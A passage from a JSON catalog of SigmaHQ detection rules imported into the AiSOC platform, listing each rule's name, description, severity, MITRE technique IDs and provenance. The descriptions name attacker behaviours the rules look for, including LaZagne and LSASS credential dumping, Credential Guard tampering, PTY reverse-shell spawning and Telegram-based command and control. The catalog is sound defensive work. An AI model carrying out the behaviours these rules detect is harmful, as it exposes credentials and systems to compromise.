termination of malicious activity.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1653" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/mask-system-power-settings-via-systemctl.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "c172b7b5-f3a1-4af2-90b7-822c63df86cb", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/linux/process_creation/proc_creation_lnx_systemctl_mask_power_settings.yml" } }, { "id": "sigmahq-sigma-c17d47b7-dcd6-4109-87eb-d1817bd4cbc9", "type": "detection", "name": "Windows Credential Guard Registry Tampering Via CommandLine", "description": "Detects attempts to add, modify, or delete Windows Credential Guard related registry keys or values via command line tools such as Reg.exe or PowerShell.\nCredential Guard uses virtualization-based security to isolate secrets so that only privileged system software can access them.\nAdversaries may disable Credential Guard to gain access to sensitive credentials stored in the system, such as NTLM hashes and Kerberos tickets, which can be used for lateral movement and privilege escalation.\nThe rule matches suspicious command lines that target DeviceGuard or LSA registry paths and manipulate keys like EnableVirtualizationBasedSecurity, RequirePlatformSecurityFeatures, or LsaCfgFlags.\nSuch activity may indicate an attempt to disable or tamper with Credential Guard, potentially exposing sensitive credentials for misuse.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1685" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/windows-credential-guard-registry-tampering-via-commandline.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "c17d47b7-dcd6-4109-87eb-d1817bd4cbc9", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_credential_guard_registry_tampering.yml" } }, { "id": "sigmahq-sigma-c187c075-bb3e-4c62-b4fa-beae0ffc211f", "type": "detection", "name": "A Rule Has Been Deleted From The Windows Firewall Exception List", "description": "Detects when a single rules or all of the rules have been deleted from the Windows Defender Firewall", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1686.003" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/a-rule-has-been-deleted-from-the-windows-firewall-exception-list.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "c187c075-bb3e-4c62-b4fa-beae0ffc211f", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/builtin/firewall_as/win_firewall_as_delete_rule.yml" } }, { "id": "sigmahq-sigma-c191e2fa-f9d6-4ccf-82af-4f2aba08359f", "type": "detection", "name": "Logon from a Risky IP Address", "description": "Detects when a Microsoft Cloud App Security reported when a user signs into your sanctioned apps from a risky IP address.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.cloud" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1078" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/logon-from-a-risky-ip-address.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "c191e2fa-f9d6-4ccf-82af-4f2aba08359f", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/cloud/m365/threat_management/microsoft365_logon_from_risky_ip_address.yml" } }, { "id": "sigmahq-sigma-c1d147ae-a951-48e5-8b41-dcd0170c7213", "type": "detection", "name": "App Granted Microsoft Permissions", "description": "Detects when an application is granted delegated or app role permissions for Microsoft Graph, Exchange, Sharepoint, or Azure AD", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.cloud" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1528" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/app-granted-microsoft-permissions.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "c1d147ae-a951-48e5-8b41-dcd0170c7213", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/cloud/azure/audit_logs/azure_app_permissions_msft.yml" } }, { "id": "sigmahq-sigma-c1d867fe-8d95-4487-aab4-e53f2d339f90", "type": "detection", "name": "Renamed Sysinternals Sdelete Execution", "description": "Detects the use of a renamed SysInternals Sdelete, which is something an administrator shouldn't do (the renaming)", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1485" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/renamed-sysinternals-sdelete-execution.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "c1d867fe-8d95-4487-aab4-e53f2d339f90", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_renamed_sysinternals_sdelete.yml" } }, { "id": "sigmahq-sigma-c1dda054-d638-4c16-afc8-53e007f3fbc5", "type": "detection", "name": "Automated Collection Command PowerShell", "description": "Once established within a system or network, an adversary may use automated techniques for collecting internal data.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1119" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/automated-collection-command-powershell.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "c1dda054-d638-4c16-afc8-53e007f3fbc5", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/powershell/powershell_script/posh_ps_automated_collection.yml" } }, { "id": "sigmahq-sigma-c21c4eaa-ba2e-419a-92b2-8371703cbe21", "type": "detection", "name": "Setuid and Setgid", "description": "Detects suspicious change of file privileges with chown and chmod commands", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "low", "category": "_quarantine", "mitre_techniques": [ "T1548.001" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/setuid-and-setgid.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "c21c4eaa-ba2e-419a-92b2-8371703cbe21", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/linux/process_creation/proc_creation_lnx_setgid_setuid.yml" } }, { "id": "sigmahq-sigma-c248c896-e412-4279-8c15-1c558067b6fa", "type": "detection", "name": "Enumerate All Information With Whoami.EXE", "description": "Detects the execution of \"whoami.exe\" with the \"/all\" flag", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1033" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/enumerate-all-information-with-whoami-exe.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "c248c896-e412-4279-8c15-1c558067b6fa", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_whoami_all_execution.yml" } }, { "id": "sigmahq-sigma-c2496b41-16a9-4016-a776-b23f8910dc58", "type": "detection", "name": "Certificate-Based Authentication Enabled", "description": "Detects when certificate based authentication has been enabled in an Azure Active Directory tenant.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.cloud" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1556" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/certificate-based-authentication-enabled.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "c2496b41-16a9-4016-a776-b23f8910dc58", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/cloud/azure/audit_logs/azure_ad_certificate_based_authencation_enabled.yml" } }, { "id": "sigmahq-sigma-c260b6db-48ba-4b4a-a76f-2f67644e99d2", "type": "detection", "name": "HackTool - Covenant PowerShell Launcher", "description": "Detects suspicious command lines used in Covenant luanchers", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1059.001", "T1564.003" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/hacktool-covenant-powershell-launcher.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "c260b6db-48ba-4b4a-a76f-2f67644e99d2", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_hktl_covenant.yml" } }, { "id": "sigmahq-sigma-c265cf08-3f99-46c1-8d59-328247057d57", "type": "detection", "name": "User Added to Local Administrator Group", "description": "Detects the addition of a new member to the local administrator group, which could be legitimate activity or a sign of privilege escalation activity", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "endpoint", "mitre_techniques": [ "T1078", "T1098" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": true, "path": "detections/sigma-imports/endpoint/user-added-to-local-administrator-group.yaml", "provenance": { "source": "SigmaHQ/sigma", "source_id": "c265cf08-3f99-46c1-8d59-328247057d57", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/builtin/security/win_security_user_added_to_local_administrators.yml" } }, { "id": "sigmahq-sigma-c27515df-97a9-4162-8a60-dc0eeb51b775", "type": "detection", "name": "Suspicious Microsoft OneNote Child Process", "description": "Detects suspicious child processes of the Microsoft OneNote application. This may indicate an attempt to execute malicious embedded objects from a .one file.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1566", "T1566.001" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/suspicious-microsoft-onenote-child-process.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "c27515df-97a9-4162-8a60-dc0eeb51b775", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_office_onenote_susp_child_processes.yml" } }, { "id": "sigmahq-sigma-c2993223-6da8-4b1a-88ee-668b8bf315e9", "type": "detection", "name": "User Discovery And Export Via Get-ADUser Cmdlet - PowerShell", "description": "Detects usage of the Get-ADUser cmdlet to collect user information and output it to a file", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1033" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/user-discovery-and-export-via-get-aduser-cmdlet-powershell.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "c2993223-6da8-4b1a-88ee-668b8bf315e9", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/powershell/powershell_script/posh_ps_user_discovery_get_aduser.yml" } }, { "id": "sigmahq-sigma-c2b86e67-b880-4eec-b045-50bc98ef4844", "type": "detection", "name": "HackTool - LaZagne Execution", "description": "Detects the execution of the LaZagne. A utility used to retrieve multiple types of passwords stored on a local computer.\nLaZagne has been leveraged multiple times by threat actors in order to dump credentials.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/hacktool-lazagne-execution.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "c2b86e67-b880-4eec-b045-50bc98ef4844", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_hktl_lazagne.yml" } }, { "id": "sigmahq-sigma-c2c76b77-32be-4d1f-82c9-7e544bdfe0eb", "type": "detection", "name": "Potential Suspicious Activity Using SeCEdit", "description": "Detects potential suspicious behaviour using secedit.exe. Such as exporting or modifying the security policy", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1685.001", "T1547.001", "T1505.005", "T1556.002", "T1685", "T1574.007", "T1564.002", "T1546.008", "T1546.007", "T1547.014", "T1547.010", "T1547.002", "T1557", "T1082" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/potential-suspicious-activity-using-secedit.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "c2c76b77-32be-4d1f-82c9-7e544bdfe0eb", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_secedit_execution.yml" } }, { "id": "sigmahq-sigma-c2e234de-03a3-41e1-b39a-1e56dc17ba67", "type": "detection", "name": "Remove Scheduled Cron Task/Job", "description": "Detects usage of the 'crontab' utility to remove the current crontab.\nThis is a common occurrence where cryptocurrency miners compete against each other by removing traces of other miners to hijack the maximum amount of resources possible", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/remove-scheduled-cron-task-job.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "c2e234de-03a3-41e1-b39a-1e56dc17ba67", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/linux/process_creation/proc_creation_lnx_crontab_removal.yml" } }, { "id": "sigmahq-sigma-c30fb093-1109-4dc8-88a8-b30d11c95a5d", "type": "detection", "name": "Whoami.EXE Execution With Output Option", "description": "Detects the execution of \"whoami.exe\" with the \"/FO\" flag to choose CSV as output format or with redirection options to export the results to a file for later use.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1033" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/whoami-exe-execution-with-output-option.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "c30fb093-1109-4dc8-88a8-b30d11c95a5d", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_whoami_output.yml" } }, { "id": "sigmahq-sigma-c31364f7-8be6-4b77-8483-dd2b5a7b69a3", "type": "detection", "name": "Import PowerShell Modules From Suspicious Directories - ProcCreation", "description": "Detects powershell scripts that import modules from suspicious directories", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1059.001" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/import-powershell-modules-from-suspicious-directories-proccreation.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "c31364f7-8be6-4b77-8483-dd2b5a7b69a3", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_powershell_import_module_susp_dirs.yml" } }, { "id": "sigmahq-sigma-c363385c-f75d-4753-a108-c1a8e28bdbda", "type": "detection", "name": "Potential Manage-bde.wsf Abuse To Proxy Execution", "description": "Detects potential abuse of the \"manage-bde.wsf\" script as a LOLBIN to proxy execution", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1216" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/potential-manage-bde-wsf-abuse-to-proxy-execution.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "c363385c-f75d-4753-a108-c1a8e28bdbda", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_lolbin_manage_bde.yml" } }, { "id": "sigmahq-sigma-c39f0c81-7348-4965-ab27-2fde35a1b641", "type": "detection", "name": "DCOM InternetExplorer.Application Iertutil DLL Hijack - Security", "description": "Detects a threat actor creating a file named `iertutil.dll` in the `C:\\Program Files\\Internet Explorer\\` directory over the network for a DCOM InternetExplorer DLL Hijack scenario.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1021.002", "T1021.003" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/dcom-internetexplorer-application-iertutil-dll-hijack-security.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "c39f0c81-7348-4965-ab27-2fde35a1b641", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/builtin/security/win_security_dcom_iertutil_dll_hijack.yml" } }, { "id": "sigmahq-sigma-c3a99af4-35a9-4668-879e-c09aeb4f2bdf", "type": "detection", "name": "Rundll32 Execution With Uncommon DLL Extension", "description": "Detects the execution of rundll32 with a command line that doesn't contain a common extension", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1218.011" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/rundll32-execution-with-uncommon-dll-extension.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "c3a99af4-35a9-4668-879e-c09aeb4f2bdf", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_rundll32_uncommon_dll_extension.yml" } }, { "id": "sigmahq-sigma-c3cefdf4-6703-4e1c-bad8-bf422fc5015a", "type": "detection", "name": "Outlook Security Settings Updated - Registry", "description": "Detects changes to the registry values related to outlook security settings", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1137" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/outlook-security-settings-updated-registry.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "c3cefdf4-6703-4e1c-bad8-bf422fc5015a", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/registry/registry_set/registry_set_office_outlook_security_settings.yml" } }, { "id": "sigmahq-sigma-c3d76afc-93df-461e-8e67-9b2bad3f2ac4", "type": "detection", "name": "File Explorer Folder Opened Using Explorer Folder Shortcut Via Shell", "description": "Detects the initial execution of \"cmd.exe\" which spawns \"explorer.exe\" with the appropriate command line arguments for opening the \"My Computer\" folder.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1135" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/file-explorer-folder-opened-using-explorer-folder-shortcut-via-shell.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "c3d76afc-93df-461e-8e67-9b2bad3f2ac4", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_explorer_folder_shortcut_via_shell_binary.yml" } }, { "id": "sigmahq-sigma-c3dbbc9f-ef1d-470a-a90a-d343448d5875", "type": "detection", "name": "Suspicious Non-Browser Network Communication With Telegram API", "description": "Detects an a non-browser process interacting with the Telegram API which could indicate use of a covert C2", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1102", "T1567", "T1105" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/suspicious-non-browser-network-communication-with-telegram-api.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "c3dbbc9f-ef1d-470a-a90a-d343448d5875", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/network_connection/net_connection_win_domain_telegram_api_non_browser_access.yml" } }, { "id": "sigmahq-sigma-c3e5c1b1-45e9-4632-b242-27939c170239", "type": "detection", "name": "Sysmon Blocked File Shredding", "description": "Triggers on any Sysmon \"FileBlockShredding\" event, which indicates a violation of the configured shredding policy.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/sysmon-blocked-file-shredding.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "c3e5c1b1-45e9-4632-b242-27939c170239", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/sysmon/sysmon_file_block_shredding.yml" } }, { "id": "sigmahq-sigma-c3e76af5-4ce0-4a14-9c9a-25ceb8fda182", "type": "detection", "name": "WerFault LSASS Process Memory Dump", "description": "Detects WerFault creating a dump file with a name that indicates that the dump file could be an LSASS process memory, which contains user credentials", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1003.001" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/werfault-lsass-process-memory-dump.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "c3e76af5-4ce0-4a14-9c9a-25ceb8fda182", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/file/file_event/file_event_win_lsass_werfault_dump.yml" } }, { "id": "sigmahq-sigma-c3edc6a5-d9d4-48d8-930e-aab518390917", "type": "detection", "name": "Potential Persistence Via Outlook Form", "description": "Detects the creation of a new Outlook form which can contain malicious code", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1137.003" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/potential-persistence-via-outlook-form.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "c3edc6a5-d9d4-48d8-930e-aab518390917", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/file/file_event/file_event_win_office_outlook_newform.yml" } }, { "id": "sigmahq-sigma-c3f265c7-ff03-4056-8ab2-d486227b4599", "type": "detection", "name": "Restore Public AWS RDS Instance", "description": "Detects the recovery of a new public database instance from a snapshot. It may be a part of data exfiltration.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.cloud" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1020" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/restore-public-aws-rds-instance.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "c3f265c7-ff03-4056-8ab2-d486227b4599", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/cloud/aws/cloudtrail/aws_rds_public_db_restore.yml" } }, { "id": "sigmahq-sigma-c4042d54-110d-45dd-a0e1-05c47822c937", "type": "detection", "name": "Python Spawning Pretty TTY Via PTY Module", "description": "Detects a python process calling to the PTY module in order to spawn a pretty tty which could be indicative of potential reverse shell activity.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1059" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/python-spawning-pretty-tty-via-pty-module.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "c4042d54-110d-45dd-a0e1-05c47822c937", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/linux/process_creation/proc_creation_lnx_python_pty_spawn.yml" } }, { "id": "sigmahq-sigma-c420410f-c2d8-4010-856b-dffe21866437", "type": "detection", "name": "Enable LM Hash Storage", "description": "Detects changes to the \"NoLMHash\" registry value in order to allow Windows to store LM Hashes.\nBy setting this registry value to \"0\" (DWORD), Windows will be allowed to store a LAN manager hash of your password in Active Directory and local SAM databases.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1112" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, 